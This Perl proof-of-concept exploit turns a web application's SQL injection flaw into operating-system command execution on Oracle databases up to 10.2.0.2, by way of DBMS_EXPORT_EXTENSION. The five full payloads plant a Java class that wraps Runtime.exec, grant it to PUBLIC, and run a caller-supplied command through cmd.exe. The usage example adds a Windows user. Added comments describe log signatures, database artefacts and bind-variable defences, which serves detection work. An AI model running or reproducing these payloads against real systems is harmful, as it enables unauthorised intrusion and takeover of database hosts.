#!/usr/bin/env perl
# Proof-of-concept, as written by its original author, that drives an SQL
# injection point in a web application into Oracle's
# SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES.  The banner below names
# "<=10.2.0.2" as the affected patch level.  For anyone reading this to
# understand the server-side footprint: every request is the caller-supplied
# URL with "and 1=(select ...)--" appended, so it only works when the target
# concatenates that parameter straight into an SQL statement; bind variables
# on the application side stop step 1 before the database is reached.  Each
# of the five steps is one HTTP GET whose injected subselect leaves a distinct
# artefact in the database (noted at each payload).  Neither `use strict` nor
# `use warnings` is enabled, which is why the repeated file-scope `my $url` /
# `my $content` declarations below pass silently.
use LWP::Simple;   # get() returns the response body, or undef on any transport/HTTP failure

print " -----------------------------------------------------------------------\n";
print "Oracle command execution via web apps\n";
print "sid-at-NotSoSecure // www.notsosecure.com \n";
print "suported versions <=10.2.0.2, all platforms\n";
print "------------------------------------------------------------------------\n";

# Two positional arguments are required: the injection URL and the OS command.
if (@ARGV < 2)
{
	print "Usage:\n";
	print "ora_cmd_exec.pl <URL> <cmd-to-exec>\n";
	print "\n";
	print "EXAMPLE: ./ora_cmd_exec.pl \"http://192.168.172.129:81/ora3.php?name=s\' \" \"net user notsosecure n0tsos3cur3 /add\"\n";
	print "EXAMPLE: ./ora_cmd_exec.pl \"http://192.168.172.129:81/ora3.php?id=100 \" \"net user notsosecure n0tsos3cur3 /add\"\n";
	print "------------------------------------------------------------------------\n";
	
exit();
}

# Common prefix for every request.  The usage examples end the URL with a
# space precisely so that "and 1=" is separated from the parameter value;
# nothing here inserts that space.  In web-server access logs the tell-tale
# is a query string containing "and 1=(select SYS.DBMS_EXPORT_EXTENSION".
my $url_1 = $ARGV[0]."and 1=";

# Step 1 payload.  The third argument to GET_DOMAIN_INDEX_TABLES is crafted so
# that the nested EXECUTE IMMEDIATE levels (each level doubles the quotes,
# hence '' / '''' / '''''''') run a "create or replace and compile java
# source named LinxUtil" statement.  LinxUtil.runCMD wraps Runtime.exec and
# readFile wraps FileReader.  "%2b" is URL-encoded "+" so the Java string
# concatenation survives the query string.  Artefact: a new Java source
# object LinxUtil owned by SYS (DBA_OBJECTS, OBJECT_TYPE = 'JAVA SOURCE').
my $javalib="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE 
''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named 
\"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) 
{try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() 
) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return 
str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader 
myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != 
null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return 
e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual)--";

# Step 2 payload: same wrapper, inner statement calls dbms_java.grant_permission
# giving PUBLIC a java.io.FilePermission with the "execute" action.  Artefact:
# a DBMS_JAVA.GRANT_PERMISSION call with grantee PUBLIC in the audit trail /
# a new row in DBA_JAVA_POLICY.
my $javaperm="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( 
''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual)--";

# Step 3 payload: creates the PL/SQL function LinxRunCMD as a Java call spec
# for LinxUtil.runCMD.  Artefact: a FUNCTION object named LinxRunCMD owned by SYS.
my $cmd_exec_func="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function 
LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual)--";

# Step 4 payload: "grant all on LinxRunCMD to public" so the (non-SYS) web
# application account can call it in step 5.  Artefact: a PUBLIC grant on a
# SYS-owned function in DBA_TAB_PRIVS.
my $cmd_exec_func_priv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD 
to public'''';END;'';END;--','SYS',0,'1',0) from dual)--";
  
# Step 5 payload: calls the function created above.  The command is
# hard-wired behind "cmd.exe /c", so this final step assumes a Windows host
# even though the banner claims all platforms.  $ARGV[1] is spliced into the
# SQL string literal with no quoting, so a command containing a single quote
# simply breaks the statement.
my $cmd_1=$ARGV[1];
my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual)--";

print "Step 1. Creating Java Library...\n";
print "--------------------------------\n";
my $url=$url_1.$javalib;
my $content = get $url;
die "Couldn't get $url" unless defined $content;


  # Success detection is only a case-insensitive search for "warning" in the
  # response body (i.e. a PHP warning being echoed).  A target that hides
  # errors reports "NO errors" here regardless of what the database did.
  if($content =~ m/warning/i) {
	print "-----------------------------------------------\n";
    print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
	print "-----------------------------------------------\n";
  } else {
    print "NO errors encountered.....proceeding to step..2\n";
	print "--------------------------------\n";
	
# print $content; 
}

#-----------------------
print "Step 2. granting java execute privileges...\n";
my $url=$url_1.$javaperm;
my $content = get $url;
die "Couldn't get $url" unless defined $content;


  # Same "warning" heuristic as step 1; a failure here is reported but not fatal.
  if($content =~ m/warning/i) {
	print "-----------------------------------------------\n";
    print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
	print "-----------------------------------------------\n";
	print "I will proceed, however, there is a possibility that the attack will fail\n";
  } else {
    print "NO errors encountered.....proceeding to step..3\n";
	print "--------------------------------\n";
	
# print $content; 
}

#-----------------------
print "Step 3. creating funtion for command execution...\n";
my $url=$url_1.$cmd_exec_func;
my $content = get $url;
die "Couldn't get $url" unless defined $content;


  # Same "warning" heuristic; failure reported, script continues.
  if($content =~ m/warning/i) {
	print "-----------------------------------------------\n";
	print "ERROR at STAGE 3 occured !!!...something was not right.. \n";
	print "-----------------------------------------------\n";
	print "I will proceed, however, there is a possibility that the attack will fail\n";
  } else {
    print "NO errors encountered.....proceeding to step..4\n";
	print "--------------------------------\n";
	
# print $content; 
}

#-----------------------
print "Step 4. making function executable by all users...\n";
my $url=$url_1.$cmd_exec_func_priv;
my $content = get $url;
die "Couldn't get $url" unless defined $content;


  # Same "warning" heuristic; failure reported, script continues.
  if($content =~ m/warning/i) {
	print "-----------------------------------------------\n";
    print "ERROR at STAGE 4 occured !!!...something was not right.. \n";
	print "-----------------------------------------------\n";
	print "I will proceed, however, there is a possibility that the attack will fail\n";
  } else {
    print "NO errors encountered.....proceeding to step..5\n";
	print "--------------------------------\n";
	
# print $content; 
}

#-----------------------
print "Step 5. RIGHT!!!, by now we should have a function sys.LinxRunCMD through which we can execute commands...\n";
print "--------------------------------\n";
print "You should be able to execute this function as:\nselect sys.LinxRunCMD('cmd.exe /c net user notsosecure n0ts3cur3 /add') from dual\n";
print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
my $url=$url_1.$cmd_exec;
my $content = get $url;
die "Couldn't get $url" unless defined $content;


  # The function's return value is never surfaced: the response body is not
  # printed (see the commented-out line), so "SUCCESS" only means the page
  # came back without the word "warning" in it.
  if($content =~ m/warning/i) {
	print "-----------------------------------------------\n";
    print "ERROR at STAGE 5 occured !!!...something was not right.. \n";
	print "-----------------------------------------------\n";
	print "...You need to investigate buddy....\n";
  } else {
	print "-----------------------------------------------\n";
	print "SUCCESS: Your command executed on the box....:)\n";
	print "-----------------------------------------------\n";
	
# print $content; 
}
